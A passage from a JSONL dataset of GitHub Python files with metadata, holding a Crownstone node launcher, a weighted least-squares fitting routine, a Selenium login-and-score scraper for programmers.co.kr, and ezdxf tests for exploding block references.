"usage_type": "call"}, {"api_name": "PIL.ImageTk", "line_number": 6, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 6, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 6, "usage_type": "name"}, {"api_name": "PIL.ImageTk.PhotoImage", "line_number": 7, "usage_type": "call"}, {"api_name": "PIL.ImageTk", "line_number": 7, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 7, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 7, "usage_type": "name"}, {"api_name": "PIL.ImageTk.PhotoImage", "line_number": 8, "usage_type": "call"}, {"api_name": "PIL.ImageTk", "line_number": 8, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 8, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 8, "usage_type": "name"}, {"api_name": "PIL.ImageTk.PhotoImage", "line_number": 9, "usage_type": "call"}, {"api_name": "PIL.ImageTk", "line_number": 9, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 9, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 9, "usage_type": "name"}]} +{"seq_id": "33470390842", "text": "#!/bin/python3\n\nfrom CrownstoneYodiwo import CrownstoneNode\n\nfrom pathlib import Path\nimport argparse\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--configFile', default='nodeConfig.json', help='configuration file')\nargs = parser.parse_args()\nconfigFile = args.configFile\n\ncFile = Path(configFile)\nif cFile.is_file():\n node = CrownstoneNode()\n node.loadConfig(configFile)\n node.start()\nelse:\n print(\"Error: File \" + configFile + \" does not exist\")\n", "repo_name": "crownstone/yodiwo-crownstone-node", "sub_path": "bin/yodiwo-crownstone.py", "file_name": "yodiwo-crownstone.py", "file_ext": "py", "file_size_in_byte": 488, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 8, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 13, "usage_type": "call"}, {"api_name": "CrownstoneYodiwo.CrownstoneNode", "line_number": 15, "usage_type": "call"}]} +{"seq_id": "28385475811", "text": "# -*- coding: utf-8 -*-\n\"\"\"\n\nweighted2D.py\nContains functions to perform weighted least squares linear fit when there\nis error in both the x and y directions\n\nReference: B. Reed \"Linear least-squares fits with errors in both\ncoordinates. II: Comments on parameter variances\", Am. J. Phys, 60, 1992\n\n\"\"\"\n\ndef mfunc(m, x_in, y_in):\n # MFUNC - function to be minimized in order to find best slope\n\n import numpy as np\n\n # Separate x and y from their weights\n x = x_in[:,0]\n y = y_in[:,0]\n Wxi = x_in[:,1]\n Wyi = y_in[:,1]\n\n # Calculate weight for each data point\n Wi = Wxi*Wyi/(m**2*Wyi+Wxi) # Eq 8\n\n # Weighted means and deviations from weighted means\n xbar = np.sum(Wi*x)/np.sum(Wi) # Eq 11\n ybar = np.sum(Wi*y)/np.sum(Wi) # Eq 12\n U = x-xbar # Eq 9\n V = y-ybar # Eq 10\n\n # Minimization function (eq 19 from paper)\n g = (m**2*np.sum((Wi**2)*U*V/Wxi) + m*np.sum((Wi**2)*((U**2)/Wyi - \n (V**2)/Wxi)) - np.sum((Wi**2)*U*V/Wyi)) \n g = g**2\n\n return g\n \n\ndef wls2d(x, y, delx, dely):\n \"\"\" \n WLS2D Calculates the weighted least squares fit to a straight line when\n there are errors in both the x and y directions.\n\n Reference: B. Reed \"Linear least-squares fits with errors in both\n coordinates. II: Comments on parameter variances\", Am. J. 
Phys, 60, 1992\n\n fitparams = wls2d(x, y, delx, dely, flag);\n\n INPUTS\n x vector of independent data points\n y vector of dependent data points\n delx vector of uncertainties/errors in x points\n dely vector of uncertainties/errors in y points\n\n OUTPUT\n fitparams vector of fit parameters\n fitparams[0] best fit slope\n fitparams[1] best fit y intercept\n fitparams[2] uncertainty in slope\n fitparams[3] uncertainty in y-intercept\n\n Note: equation numbers from B. Reed's paper\n \"\"\"\n\n import numpy as np\n from numpy.matlib import repmat\n from scipy.optimize import fmin\n\n N = len(x)\n\n # Calculate weights and weighted means\n Wxi = 1/(delx**2)\n Wyi = 1/(dely**2)\n \n # Force vectors to be column vectors \n x.shape = (N,1)\n y.shape = (N,1)\n Wxi.shape = (N,1)\n Wyi.shape = (N,1)\n\n # Add weights as second columns to x and y\n xWxi = np.append(x, Wxi, axis=1)\n yWyi = np.append(y, Wyi, axis=1)\n\n # Use unweighted linear regression to find a slope initial guess\n m0 = ((N*np.sum(x*y) - np.sum(x)*np.sum(y))/(N*np.sum(x**2) - np.sum(x)**2))\n\n # Find best slope\n m = fmin(func=mfunc, x0=m0, args=(xWxi, yWyi,))\n\n\n # Calculate final weight for each data point\n Wi = Wxi*Wyi/(m**2*Wyi+Wxi) # Eq 8\n Wj = Wi\n\n # Weighted means & deviations from weighted means\n xbar = np.sum(Wi*x)/np.sum(Wi) # Eq 11\n ybar = np.sum(Wi*y)/np.sum(Wi) # Eq 12\n U = x-xbar # Eq 9\n V = y-ybar # Eq 10\n\n # Calculate corresponding y-intercept (equation 13)\n c = ybar - m*xbar # Eq 13\n\n # Sum of weighted residuals\n S = np.sum(Wi*((V-m*U)**2)) # Eq 14\n\n # Use calculated data points\n lam = Wi*(c + m*x - y) # Eq 26\n x = x - lam*m/Wxi # Eq 24\n y = y + lam/Wyi # Eq 25\n xbar = np.sum(Wi*x)/np.sum(Wi) # Eq 11\n ybar = np.sum(Wi*y)/np.sum(Wi) # Eq 12 \n U = x-xbar # Eq 9\n V = y-ybar # Eq 10\n\n\n # Calculate parameter derivatives (Appendix)\n W = np.sum(Wi) # Eq A10\n HH = -2*m/W*np.sum(Wi**2*V/Wxi) # Eq A11\n JJ = -2*m/W*np.sum(Wi**2*U/Wxi) # Eq A12\n AA = 4*m*np.sum(Wi**3*U*V/Wxi**2) - W*HH*JJ/m # Eq A3\n BB = -np.sum(Wi**2*(4*m*Wi/Wxi*(U**2/Wyi - V**2/Wxi) - 2*V*HH/Wxi + \n 2*U*JJ/Wyi)) # Eq A4\n CC = -np.sum(Wi**2/Wyi*(4*m*Wi*U*V/Wxi + V*JJ + U*HH)) # Eq A5\n delta = np.eye(N) # Kroneker Delta\n delmat = delta - repmat(Wj,1,N)/W\n DD = np.dot(delmat,(Wi**2*V/Wxi)) # Eq A6\n EE = 2*np.dot(delmat,(Wi**2*U/Wyi)) # Eq A7\n FF = np.dot(delmat,(Wi**2*V/Wyi)) # Eq A8\n GG = np.dot(delmat,(Wi**2*U/Wxi)) # Eq A9\n A = np.sum(Wi**2*U*V/Wxi) # Eq 19 & 20\n B = np.sum(Wi**2*(U**2/Wyi - V**2/Wxi)) # Eq 19 & 20\n dmdxj = -1*(m**2*DD + m*EE - FF)/(2*m*A + B - AA*m**2 + BB*m - CC) # Eq A1\n dmdyj = -1*(m**2*GG - 2*m*DD - 0.5*EE)/(2*m*A + B - AA*m**2 + BB*m - \n CC); # Eq A2 \n dcdxj = (HH - m*JJ - xbar)*dmdxj - m*Wj/W # Eq A13\n dcdyj = (HH - m*JJ - xbar)*dmdyj + Wj/W # Eq A14\n delm = np.sqrt(S/(N-2)*np.sum(1/Wyi*dmdyj**2 + 1/Wxi*dmdxj**2)) # Eq 21\n delc = np.sqrt(S/(N-2)*np.sum(1/Wyi*dcdyj**2 + 1/Wxi*dcdxj**2)) # Eq 21\n\n fitparams = np.concatenate((m, c))\n fitparams = np.append(fitparams, delm)\n fitparams = np.append(fitparams, delc)\n\n return fitparams\n\n", "repo_name": "tzsummerscales/linfit2Derrors", "sub_path": "weighted2D.py", "file_name": "weighted2D.py", "file_ext": "py", "file_size_in_byte": 4465, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "numpy.sum", "line_number": 28, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 29, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 34, 
"usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 35, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 84, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 85, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 88, "usage_type": "call"}, {"api_name": "scipy.optimize.fmin", "line_number": 91, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 99, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 100, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 108, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 114, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 115, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 121, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 122, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 123, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 124, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 125, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 127, "usage_type": "call"}, {"api_name": "numpy.eye", "line_number": 128, "usage_type": "call"}, {"api_name": "numpy.matlib.repmat", "line_number": 129, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 130, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 131, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 132, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 133, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 134, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 135, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 141, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 141, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 142, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 142, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 144, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 145, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 146, "usage_type": "call"}]} +{"seq_id": "31175258628", "text": "from selenium import webdriver\nfrom selenium.webdriver.chrome.options import Options\nfrom selenium.webdriver.common.by import By\nfrom webdriver_manager.chrome import ChromeDriverManager\nimport time\n\ndef progarmmers(id,pw):\n try:\n noopen = webdriver.ChromeOptions()\n noopen.add_argument(\"headless\")\n driver = webdriver.Chrome(ChromeDriverManager().install(),options=noopen)\n \n url = 'https://programmers.co.kr/account/sign_in?referer=https://school.programmers.co.kr/learn/challenges?order=recent&page=1'\n driver.get(url)\n # driver.maximize_window() # 화면을 열고 풀스크린으로 적용\n id_box = driver.find_element(by=By.XPATH,value='//*[@id=\"main-app-account\"]/div/div[2]/div/div[2]/div[1]/div/div[2]/div[2]/input')\n id_box.click()\n id_box.send_keys(id)\n\n pw_box = driver.find_element(by=By.XPATH,value='//*[@id=\"main-app-account\"]/div/div[2]/div/div[2]/div[1]/div/div[2]/div[4]/input')\n pw_box.click()\n pw_box.send_keys(pw)\n\n login_box = driver.find_element(by=By.CSS_SELECTOR,value='#main-app-account > div > div.CqFgmmYa7JLTXOn9RZNl > div > div._i_cm82hE96w0g1ww1rO > div.by9dgl6a9xm729a_4ynt > div > div.G7QZ1shWGosDZ1csHsNt > button')\n login_box.click()\n time.sleep(1)\n\n score = driver.find_element(by=By.XPATH, 
value='//*[@id=\"edu-service-app-main\"]/div/div[2]/article/div[2]/aside/div[1]/div/ul/li[2]/div[2]')\n return score.text\n except:\n return '아이디/비밀번호가 잘못되었습니다.'", "repo_name": "JunHeeMerong/JunBlog", "sub_path": "main/programmers.py", "file_name": "programmers.py", "file_ext": "py", "file_size_in_byte": 1548, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "selenium.webdriver.ChromeOptions", "line_number": 9, "usage_type": "call"}, {"api_name": "selenium.webdriver", "line_number": 9, "usage_type": "name"}, {"api_name": "selenium.webdriver.Chrome", "line_number": 11, "usage_type": "call"}, {"api_name": "selenium.webdriver", "line_number": 11, "usage_type": "name"}, {"api_name": "webdriver_manager.chrome.ChromeDriverManager", "line_number": 11, "usage_type": "call"}, {"api_name": "selenium.webdriver.common.by.By.XPATH", "line_number": 16, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 16, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.XPATH", "line_number": 20, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 20, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.CSS_SELECTOR", "line_number": 24, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 24, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 26, "usage_type": "call"}, {"api_name": "selenium.webdriver.common.by.By.XPATH", "line_number": 28, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 28, "usage_type": "name"}]} +{"seq_id": "70791181288", "text": "from typing import cast, Union\n\nimport pytest\nimport ezdxf\nimport math\n\nfrom ezdxf.entities import Ellipse, Point, Arc\nfrom ezdxf.explode import angle_to_param\nfrom ezdxf.math import normalize_angle, Vector\n\n\n@pytest.fixture(scope='module')\ndef doc():\n d = ezdxf.new()\n blk = d.blocks.new('Test1')\n blk.add_line((0, 0), (1, 0))\n blk.add_line((0, 0), (0, 1))\n msp = d.modelspace()\n msp.add_blockref('Test1', (10, 10))\n msp.add_blockref('Test1', (20, 10), dxfattribs={'xscale': 2}) # yscale and zscale\n return d\n\n\n@pytest.fixture(scope='module')\ndef msp(doc):\n return doc.modelspace()\n\n\n@pytest.fixture(scope='module')\ndef entitydb(doc):\n return doc.entitydb\n\n\ndef test_01_virtual_entities(msp):\n blockrefs = msp.query('INSERT')\n blockref = blockrefs[0]\n\n virtual_entities = list(blockref.virtual_entities())\n assert len(virtual_entities) == 2\n\n e = virtual_entities[0]\n # Virtual entities should not be stored in the entity database.\n assert e.dxf.handle is None, 'handle should be None'\n # Virtual entities should not reside in a layout.\n assert e.dxf.owner is None, 'owner should be None'\n # Virtual entities should be assigned to the same document as the block reference.\n assert e.doc is blockref.doc\n\n assert e.dxftype() == 'LINE'\n assert e.dxf.start == blockref.dxf.insert\n assert e.dxf.end == blockref.dxf.insert + (1, 0)\n\n e = virtual_entities[1]\n assert e.dxftype() == 'LINE'\n assert e.dxf.start == blockref.dxf.insert\n assert e.dxf.end == blockref.dxf.insert + (0, 1)\n\n blockref = blockrefs[1]\n virtual_entities = list(blockref.virtual_entities(non_uniform_scaling=False))\n assert len(virtual_entities) == 0\n virtual_entities = list(blockref.virtual_entities(non_uniform_scaling=True))\n assert len(virtual_entities) == 2\n\n e = 
virtual_entities[0]\n assert e.dxftype() == 'LINE'\n assert e.dxf.start == blockref.dxf.insert\n assert e.dxf.end == blockref.dxf.insert + (2, 0), 'should apply xscale 2'\n\n e = virtual_entities[1]\n assert e.dxftype() == 'LINE'\n assert e.dxf.start == blockref.dxf.insert\n assert e.dxf.end == blockref.dxf.insert + (0, 1), 'should apply yscale 1'\n\n\ndef test_02_explode_blockrefs(doc, msp, entitydb):\n blockrefs = msp.query('INSERT')\n blockref = blockrefs.first\n blockref_owner = blockref.dxf.owner\n blockref_insert = blockref.dxf.insert\n\n assert len(msp) == 2 # 2 INSERT\n exploded_entities = blockref.explode()\n assert blockref.is_alive is False, 'Exploded block reference should be destroyed.'\n assert len(exploded_entities) == 2\n assert len(msp) == 3 # 2 INSERT - 1 exploded INSERT + 2 LINE\n\n e = exploded_entities[0]\n # Exploded entities should be stored in the entity database.\n assert e.dxf.handle is not None, 'entity should have a handle'\n assert e.dxf.handle in entitydb\n # Exploded entities should reside in a layout.\n assert e.dxf.owner is not None, 'entity should have an owner'\n assert e.dxf.owner is blockref_owner\n # Exploded entities should be assigned to the same document as the block reference.\n assert e.doc is doc\n\n assert e.dxftype() == 'LINE'\n assert e.dxf.start == blockref_insert\n assert e.dxf.end == blockref_insert + (1, 0)\n\n e = exploded_entities[1]\n assert e.dxftype() == 'LINE'\n assert e.dxf.start == blockref_insert\n assert e.dxf.end == blockref_insert + (0, 1)\n\n\ndef test_03_explode_polyline_bulge(doc, msp):\n blk = doc.blocks.new('Test03')\n blk.add_lwpolyline([(0, 0), (3, 0, 0.5), (6, 0), (9, 0)], format='xyb')\n block_ref = msp.add_blockref('Test03', insert=(0, 0), dxfattribs={\n 'yscale': 0.5,\n })\n entities = list(block_ref.virtual_entities(non_uniform_scaling=True))\n assert len(entities) == 3\n\n e = entities[0]\n assert e.dxftype() == 'LINE'\n assert e.dxf.start == (0, 0)\n assert e.dxf.end == (3, 0)\n\n e = entities[1]\n e = cast(Ellipse, e)\n assert e.dxftype() == 'ELLIPSE'\n assert e.dxf.center.isclose((4.5, 0.5625, 0))\n assert e.dxf.major_axis.isclose((1.875, 0.0, 0))\n assert e.dxf.ratio == 0.5\n assert math.isclose(e.dxf.start_param, -2.498091544796509 % math.tau)\n assert math.isclose(e.dxf.end_param, -0.6435011087932843 % math.tau)\n assert e.start_point.isclose(Vector(3, 0, 0))\n assert e.end_point.isclose(Vector(6, 0, 0), abs_tol=1e-5)\n\n e = entities[2]\n assert e.dxftype() == 'LINE'\n assert e.dxf.start == (6, 0)\n assert e.dxf.end == (9, 0)\n\n\ndef test_04_explode_blockref_with_attrib(doc, msp, entitydb):\n blockref = msp.add_blockref('Test1', (20, 10)) # with attrib\n blockref.add_attrib(tag='TAG', text='Text', insert=(1.5, 2.6))\n assert len(blockref.attribs) == 1, 'Error in add_attrib()'\n attrib = blockref.attribs[0]\n\n exploded_entities = blockref.explode()\n assert blockref.is_alive is False, 'Exploded block reference should be destroyed.'\n assert attrib.is_alive is False, 'Exploded attribs should be destroyed.'\n assert len(exploded_entities) == 3, '2x LINE and 1x TEXT'\n text = exploded_entities[-1]\n assert text.dxftype() == 'TEXT'\n assert text.dxf.text == 'Text'\n assert text.dxf.insert == (1.5, 2.6), 'ATTRIB already located in WCS'\n\n\ndef test_05_examine_uniform_scaled_ellipse(doc, msp):\n blk = doc.blocks.new('EllipseBlk')\n blk.add_ellipse((0, 0), major_axis=(2, 0), ratio=0.5)\n blkref = msp.add_blockref('EllipseBlk', insert=(2, 2)).scale(2)\n ellipse = list(blkref.virtual_entities())[0]\n assert 
ellipse.dxftype() == 'ELLIPSE'\n assert ellipse.dxf.center == (2, 2)\n assert ellipse.dxf.major_axis == (4, 0)\n assert ellipse.dxf.ratio == 0.5\n\n\ndef test_06_skipped_entities_callback(doc, msp):\n blk = doc.blocks.new('test_block')\n hatch = blk.add_hatch()\n edge_path = hatch.paths.add_edge_path()\n edge_path.add_arc((0, 0))\n blk.add_line((0, 0), (1, 0))\n blkref = msp.add_blockref('test_block', insert=(0, 0)).place((0, 0), (1, 2, 3))\n skipped_entities = []\n\n def on_entity_skipped(entity, reason):\n skipped_entities.append((entity, reason))\n\n assert not blkref.has_uniform_scaling\n assert hatch.paths.has_critical_elements()\n entities = list(blkref.virtual_entities(non_uniform_scaling=True, skipped_entity_callback=on_entity_skipped))\n\n assert len(entities) == 1\n assert entities[0].dxftype() == 'LINE'\n assert len(skipped_entities) == 1\n assert skipped_entities[0][0].dxftype() == 'HATCH'\n assert skipped_entities[0][1] == 'unsupported non-uniform scaling'\n\n\ndef _get_transformed_curve(scale_factors: Vector, rotation: float, is_arc: bool) -> Union[Ellipse, Arc]:\n doc = ezdxf.new()\n blk = doc.blocks.new('block')\n if is_arc:\n blk.add_arc((0, 0), radius=1, start_angle=0, end_angle=math.degrees(math.pi / 2))\n else:\n blk.add_ellipse((0, 0), major_axis=(1, 0), ratio=1, start_param=0, end_param=math.pi / 2)\n\n assert blk[0].start_point.isclose(Vector(1, 0, 0))\n assert blk[0].end_point.isclose(Vector(0, 1, 0))\n\n blk.add_point((1, 0))\n blk.add_point((0, 1))\n block_ref = doc.modelspace().add_blockref('block', insert=(0, 0), dxfattribs={\n 'xscale': scale_factors.x, 'yscale': scale_factors.y, 'zscale': scale_factors.z,\n 'rotation': math.degrees(rotation)\n })\n entities = list(block_ref.virtual_entities(non_uniform_scaling=True))\n assert len(entities) == 3\n\n if is_arc and block_ref.has_uniform_scaling:\n assert entities[0].dxftype() == 'ARC'\n else:\n assert entities[0].dxftype() == 'ELLIPSE'\n ellipse = cast(Union[Ellipse, Arc], entities[0])\n\n # points should have been transformed the same as the ellipse\n assert entities[1].dxftype() == 'POINT'\n start_point = cast(Point, entities[1])\n assert start_point.dxf.location.isclose(ellipse.start_point)\n assert entities[2].dxftype() == 'POINT'\n end_point = cast(Point, entities[2])\n assert end_point.dxf.location.isclose(ellipse.end_point)\n\n return ellipse\n\n\ndef _check_curve(ellipse: Ellipse, expected_start: Vector, expected_end: Vector, expected_extrusion: Vector):\n assert ellipse.start_point.isclose(expected_start)\n assert ellipse.end_point.isclose(expected_end)\n assert ellipse.dxf.extrusion.isclose(expected_extrusion)\n\n\n# TODO: currently zscale=-1 is failing\n#@pytest.mark.parametrize('zscale,is_arc', [(1, False), (0.5, False), (1, True), (0.5, True), (-1, False), (-1, True)])\n@pytest.mark.parametrize('zscale,is_arc', [(1, False), (0.5, False), (1, True), (0.5, True)])\ndef test_07_rotated_and_reflected_curves(zscale, is_arc):\n scale = Vector(1, 1, zscale)\n\n ellipse = _get_transformed_curve(scale, 0.0, is_arc)\n _check_curve(ellipse, Vector(1, 0, 0), Vector(0, 1, 0), Vector(0, 0, zscale))\n\n ellipse = _get_transformed_curve(scale, math.pi / 2, is_arc)\n _check_curve(ellipse, Vector(0, 1, 0), Vector(-1, 0, 0), Vector(0, 0, zscale))\n\n ellipse = _get_transformed_curve(scale, math.pi, is_arc)\n _check_curve(ellipse, Vector(-1, 0, 0), Vector(0, -1, 0), Vector(0, 0, zscale))\n\n ellipse = _get_transformed_curve(scale, 3 * math.pi / 2, is_arc)\n _check_curve(ellipse, Vector(0, -1, 0), Vector(1, 0, 0), 
Vector(0, 0, zscale))\n\n scale = Vector(1, -1, zscale)\n\n ellipse = _get_transformed_curve(scale, 0.0, is_arc)\n _check_curve(ellipse, Vector(1, 0, 0), Vector(0, -1, 0), Vector(0, 0, zscale))\n\n ellipse = _get_transformed_curve(scale, math.pi / 2, is_arc)\n _check_curve(ellipse, Vector(0, 1, 0), Vector(1, 0, 0), Vector(0, 0, zscale))\n\n ellipse = _get_transformed_curve(scale, math.pi, is_arc)\n _check_curve(ellipse, Vector(-1, 0, 0), Vector(0, 1, 0), Vector(0, 0, zscale))\n\n ellipse = _get_transformed_curve(scale, 3 * math.pi / 2, is_arc)\n _check_curve(ellipse, Vector(0, -1, 0), Vector(-1, 0, 0), Vector(0, 0, zscale))\n\n scale = Vector(-1, 1, zscale)\n\n ellipse = _get_transformed_curve(scale, 0.0, is_arc)\n _check_curve(ellipse, Vector(-1, 0, 0), Vector(0, 1, 0), Vector(0, 0, zscale))\n\n ellipse = _get_transformed_curve(scale, math.pi / 2, is_arc)\n _check_curve(ellipse, Vector(0, -1, 0), Vector(-1, 0, 0), Vector(0, 0, zscale))\n\n ellipse = _get_transformed_curve(scale, math.pi, is_arc)\n _check_curve(ellipse, Vector(1, 0, 0), Vector(0, -1, 0), Vector(0, 0, zscale))\n\n ellipse = _get_transformed_curve(scale, 3 * math.pi / 2, is_arc)\n _check_curve(ellipse, Vector(0, 1, 0), Vector(1, 0, 0), Vector(0, 0, zscale))\n\n scale = Vector(-1, -1, zscale)\n\n ellipse = _get_transformed_curve(scale, 0.0, is_arc)\n _check_curve(ellipse, Vector(-1, 0, 0), Vector(0, -1, 0), Vector(0, 0, zscale))\n\n ellipse = _get_transformed_curve(scale, math.pi / 2, is_arc)\n _check_curve(ellipse, Vector(0, -1, 0), Vector(1, 0, 0), Vector(0, 0, zscale))\n\n ellipse = _get_transformed_curve(scale, math.pi, is_arc)\n _check_curve(ellipse, Vector(1, 0, 0), Vector(0, 1, 0), Vector(0, 0, zscale))\n\n ellipse = _get_transformed_curve(scale, 3 * math.pi / 2, is_arc)\n _check_curve(ellipse, Vector(0, 1, 0), Vector(-1, 0, 0), Vector(0, 0, zscale))\n\n\n@pytest.mark.parametrize('stretch,is_arc', [(0.5, False), (0.5, True)])\ndef test_08_rotated_and_reflected_and_stretched_curves(stretch, is_arc):\n scale = Vector(1, stretch, 1)\n\n ellipse = _get_transformed_curve(scale, 0.0, is_arc)\n _check_curve(ellipse, Vector(1, 0, 0), Vector(0, stretch, 0), Vector(0, 0, 1))\n\n ellipse = _get_transformed_curve(scale, math.pi / 2, is_arc)\n _check_curve(ellipse, Vector(0, 1, 0), Vector(-stretch, 0, 0), Vector(0, 0, 1))\n\n ellipse = _get_transformed_curve(scale, math.pi, is_arc)\n _check_curve(ellipse, Vector(-1, 0, 0), Vector(0, -stretch, 0), Vector(0, 0, 1))\n\n ellipse = _get_transformed_curve(scale, 3 * math.pi / 2, is_arc)\n _check_curve(ellipse, Vector(0, -1, 0), Vector(stretch, 0, 0), Vector(0, 0, 1))\n\n scale = Vector(1, -stretch, 1)\n\n ellipse = _get_transformed_curve(scale, 0.0, is_arc)\n _check_curve(ellipse, Vector(1, 0, 0), Vector(0, -stretch, 0), Vector(0, 0, 1))\n\n ellipse = _get_transformed_curve(scale, math.pi / 2, is_arc)\n _check_curve(ellipse, Vector(0, 1, 0), Vector(stretch, 0, 0), Vector(0, 0, 1))\n\n ellipse = _get_transformed_curve(scale, math.pi, is_arc)\n _check_curve(ellipse, Vector(-1, 0, 0), Vector(0, stretch, 0), Vector(0, 0, 1))\n\n ellipse = _get_transformed_curve(scale, 3 * math.pi / 2, is_arc)\n _check_curve(ellipse, Vector(0, -1, 0), Vector(-stretch, 0, 0), Vector(0, 0, 1))\n\n scale = Vector(-1, stretch, 1)\n\n ellipse = _get_transformed_curve(scale, 0.0, is_arc)\n _check_curve(ellipse, Vector(-1, 0, 0), Vector(0, stretch, 0), Vector(0, 0, 1))\n\n ellipse = _get_transformed_curve(scale, math.pi / 2, is_arc)\n _check_curve(ellipse, Vector(0, -1, 0), Vector(-stretch, 0, 0), Vector(0, 0, 
1))\n\n ellipse = _get_transformed_curve(scale, math.pi, is_arc)\n _check_curve(ellipse, Vector(1, 0, 0), Vector(0, -stretch, 0), Vector(0, 0, 1))\n\n ellipse = _get_transformed_curve(scale, 3 * math.pi / 2, is_arc)\n _check_curve(ellipse, Vector(0, 1, 0), Vector(stretch, 0, 0), Vector(0, 0, 1))\n\n scale = Vector(-1, -stretch, 1)\n\n ellipse = _get_transformed_curve(scale, 0.0, is_arc)\n _check_curve(ellipse, Vector(-1, 0, 0), Vector(0, -stretch, 0), Vector(0, 0, 1))\n\n ellipse = _get_transformed_curve(scale, math.pi / 2, is_arc)\n _check_curve(ellipse, Vector(0, -1, 0), Vector(stretch, 0, 0), Vector(0, 0, 1))\n\n ellipse = _get_transformed_curve(scale, math.pi, is_arc)\n _check_curve(ellipse, Vector(1, 0, 0), Vector(0, stretch, 0), Vector(0, 0, 1))\n\n ellipse = _get_transformed_curve(scale, 3 * math.pi / 2, is_arc)\n _check_curve(ellipse, Vector(0, 1, 0), Vector(-stretch, 0, 0), Vector(0, 0, 1))\n\n\nif __name__ == '__main__':\n pytest.main([__file__])\n", "repo_name": "DatacloudIntl/dc_ezdxf", "sub_path": "tests/test_04_dxf_high_level_structs/test_414_explode_blockrefs.py", "file_name": "test_414_explode_blockrefs.py", "file_ext": "py", "file_size_in_byte": 13798, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "ezdxf.new", "line_number": 14, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 12, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 24, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 29, "usage_type": "call"}, {"api_name": "typing.cast", "line_number": 122, "usage_type": "call"}, {"api_name": "ezdxf.entities.Ellipse", "line_number": 122, "usage_type": "argument"}, {"api_name": "math.isclose", "line_number": 127, "usage_type": "call"}, {"api_name": "math.tau", "line_number": 127, "usage_type": "attribute"}, {"api_name": "math.isclose", "line_number": 128, "usage_type": "call"}, {"api_name": "math.tau", "line_number": 128, "usage_type": "attribute"}, {"api_name": "ezdxf.math.Vector", "line_number": 129, "usage_type": "call"}, {"api_name": "ezdxf.math.Vector", "line_number": 130, "usage_type": "call"}, {"api_name": "ezdxf.math.Vector", "line_number": 188, "usage_type": "name"}, {"api_name": "ezdxf.new", "line_number": 189, "usage_type": "call"}, {"api_name": "math.degrees", "line_number": 192, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 192, "usage_type": "attribute"}, {"api_name": "math.pi", "line_number": 194, "usage_type": "attribute"}, {"api_name": "ezdxf.math.Vector", "line_number": 196, "usage_type": "call"}, {"api_name": "ezdxf.math.Vector", "line_number": 197, "usage_type": "call"}, {"api_name": "math.degrees", "line_number": 203, "usage_type": "call"}, {"api_name": "typing.cast", "line_number": 212, "usage_type": "call"}, {"api_name": "typing.Union", "line_number": 212, "usage_type": "name"}, {"api_name": "ezdxf.entities.Ellipse", "line_number": 212, "usage_type": "name"}, {"api_name": "ezdxf.entities.Arc", "line_number": 212, "usage_type": "name"}, {"api_name": "typing.cast", "line_number": 216, "usage_type": "call"}, {"api_name": "ezdxf.entities.Point", "line_number": 216, "usage_type": "argument"}, {"api_name": "typing.cast", "line_number": 219, "usage_type": "call"}, {"api_name": "ezdxf.entities.Point", "line_number": 219, "usage_type": "argument"}, {"api_name": "typing.Union", "line_number": 188, "usage_type": "name"}, {"api_name": "ezdxf.entities.Ellipse", "line_number": 188, "usage_type": "name"}, 
